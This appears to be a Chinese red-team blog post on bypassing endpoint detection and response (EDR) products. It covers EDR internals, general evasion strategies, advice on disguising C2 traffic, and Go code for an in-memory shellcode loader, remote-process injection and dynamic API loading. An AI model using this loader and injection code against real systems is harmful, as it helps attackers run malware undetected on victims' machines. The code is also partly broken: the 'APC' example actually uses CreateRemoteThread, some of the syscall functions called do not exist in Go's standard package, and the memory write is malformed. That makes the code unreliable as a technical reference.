0x01 探索EDR的工作原理
什么是EDR?
EDR(Endpoint Detection and Response,终端检测与响应)是一种用于检测、分析和响应终端设备威胁的安全解决方案。它通常通过内核驱动、用户态Hook、行为分析三种方式,对终端设备的进程、文件、注册表、网络连接等活动进行全面监控,帮助企业应对复杂的高级威胁。
从攻击者的视角来看,EDR最大的威胁在于它对恶意行为的动态监控能力。无论是恶意代码加载、内存注入还是文件落地操作,EDR都可能拦截这些动作并上报分析,从而暴露攻击活动。
EDR的核心组件
要想绕过EDR,必须从其核心组成部分入手。一般来说,一个完善的EDR方案包含以下几大模块:
- 内核监控
通过内核驱动拦截系统调用,如文件操作、进程创建、网络连接等关键行为。
- 用户态Hook
在用户态对常用API函数进行Hook,比如CreateProcessW、WriteProcessMemory,用来捕获进程和内存操作。
- 行为分析引擎
通过特征匹配或机器学习建模,捕获异常行为,比如代码注入、父子进程链不正常等。
- 云端关联分析
收集主机上的行为日志上传到云端,与已知的威胁情报库进行对比,并生成告警或阻断操作。
了解了EDR的工作原理之后,我们就可以有针对性地设计绕过技术,从根本上规避它的检测机制。
---
0x02 渗透者如何绕过EDR
常见绕过思路
在实战中,绕过EDR的方法可以归纳为以下几种思路:
- 规避检测
通过修改恶意代码的行为或外观,避免触发EDR的监控。例如,使用内存加载技术避免恶意文件落地。
- 伪装流量
将恶意C2流量伪装成正常的HTTP/HTTPS或其他合法协议,绕过EDR的流量监控。
- 干扰EDR运行
直接对EDR的关键模块进行干扰,比如卸载或禁用其内核驱动。
- 逃避沙箱
针对EDR的行为分析引擎,设计反沙箱技术,伪装为正常进程。
接下来,我们以无文件攻击和进程注入绕过为例,具体演示如何对抗EDR。
---
0x03 无文件攻击的武器化实战
无文件攻击(Fileless Attack)是一种在攻击过程中不需要将恶意文件落地到磁盘的技术。通过这种方式,我们可以有效规避EDR对磁盘操作的监控。
POC代码:内存加载Shellcode
下面是一个使用Go语言实现的简单内存加载Shellcode的例子:
<pre><code class="language-go">package main
import ( "syscall" "unsafe" )
// 这是我们要执行的Shellcode(以msfvenom生成的示例为例) var shellcode = []byte{ 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, // ...省略 }
func main() { // VirtualAlloc分配内存 kernel32 := syscall.MustLoadDLL("kernel32.dll") virtualAlloc := kernel32.MustFindProc("VirtualAlloc") addr, _, _ := virtualAlloc.Call(0, uintptr(len(shellcode)), syscall.MEM_COMMIT|syscall.MEM_RESERVE, syscall.PAGE_EXECUTE_READWRITE)
// 将Shellcode拷贝到分配的内存中 for i := 0; i < len(shellcode); i++ { (byte)(unsafe.Pointer(addr + uintptr(i))) = shellcode[i] }
// 创建线程执行Shellcode createThread := kernel32.MustFindProc("CreateThread") createThread.Call(0, 0, addr, 0, 0, 0)
// 阻止主线程退出 syscall.SleepEx(syscall.INFINITE, true) }</code></pre>
关键技术点解析
- VirtualAlloc申请可执行内存
我们通过调用VirtualAlloc分配一段PAGE_EXECUTE_READWRITE权限的内存区域,用于存放Shellcode。
- 内存写入
使用指针操作将Shellcode逐字节写入分配的内存区域。
- 线程执行
通过CreateThread创建一个新线程,并指定Shellcode的内存地址作为线程入口。
通过这种方式,我们可以将恶意代码直接加载到目标进程的内存中运行,避免了磁盘文件落地。
---
0x04 进程注入技巧:EDR的噩梦
进程注入是一种经典的横向渗透技术。通过将恶意代码注入到合法进程中,我们可以绕过EDR的行为检测。
方法一:APC注入
APC(Asynchronous Procedure Call)是Windows中的一种异步调用机制。我们可以通过QueueUserAPC函数,将Shellcode注入到目标进程的上下文中。
以下是APC注入的代码实现:
<pre><code class="language-go">package main
import ( "syscall" "unsafe" )
var shellcode = []byte{ 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, // ...省略 }
func main() { // 获取目标进程句柄(假设目标进程PID已知) pid := 1234 // 替换为目标进程的PID handle, _ := syscall.OpenProcess(syscall.PROCESS_ALL_ACCESS, false, uint32(pid))
// 分配内存 addr, _, _ := syscall.VirtualAllocEx(handle, 0, uintptr(len(shellcode)), syscall.MEM_COMMIT|syscall.MEM_RESERVE, syscall.PAGE_EXECUTE_READWRITE)
// 写入Shellcode syscall.WriteProcessMemory(handle, addr, &shellcode[0], uintptr(len(shellcode)), nil)
// 创建线程执行Shellcode thread, _, _ := syscall.CreateRemoteThread(handle, nil, 0, addr, 0, 0, nil) defer syscall.CloseHandle(thread) defer syscall.CloseHandle(handle) }</code></pre>
方法二:远程线程注入
另一种常见的注入方式是通过CreateRemoteThread直接在目标进程中创建线程,运行Shellcode。这种方法比APC注入更直观,适合初学者入门。
---
0x05 对抗技术的终极指南
规避EDR检测的通用技巧
- 内存加密与解密
在加载Shellcode之前将其加密,运行时再解密,从而避免EDR扫描内存中的可疑代码。
- 反沙箱技术
在代码中加入反沙箱逻辑,比如检测虚拟机环境、延迟执行等方式,避免被EDR的沙箱分析捕获。
- 动态API调用
避免直接使用静态API函数,比如通过LoadLibrary和GetProcAddress动态解析API,从而绕过静态分析。
示例:动态加载API
<pre><code class="language-go">package main
import ( "syscall" "unsafe" )
func main() { // 动态加载kernel32.dll模块 kernel32 := syscall.NewLazyDLL("kernel32.dll") virtualAlloc := kernel32.NewProc("VirtualAlloc")
// 使用GetProcAddress调用VirtualAlloc addr, _, _ := virtualAlloc.Call(0, 0x1000, 0x3000, 0x40) _ = addr // 这里省略后续逻辑 }</code></pre>
通过这种方式,我们可以大幅降低被特征匹配检测的概率。
---
0x06 我的经验分享
作为一名红队从业者,我在实际测试中发现,EDR的检测能力并非全能。很多EDR厂商过于依赖特征匹配,忽略了行为分析的重要性。这为我们提供了大量的攻击空间。
- 不要迷信免杀工具
大多数免杀工具生成的Payload早已被EDR特征库标记,实战中建议自行编写定制化工具。
- 注重流量伪装
即使绕过了本地EDR,后续的C2通信也可能暴露攻击活动。建议将C2流量伪装成常见的网络协议。
- 定期研究EDR更新
EDR厂商会不断改进检测能力,我们的对抗技术也必须不断升级,才能始终保持领先。
注意:本文仅供安全研究使用,切勿将这些技术用于非法目的。
---
以上内容涵盖了EDR绕过的核心技术和实战思路,希望能够为红队从业者提供有价值的参考。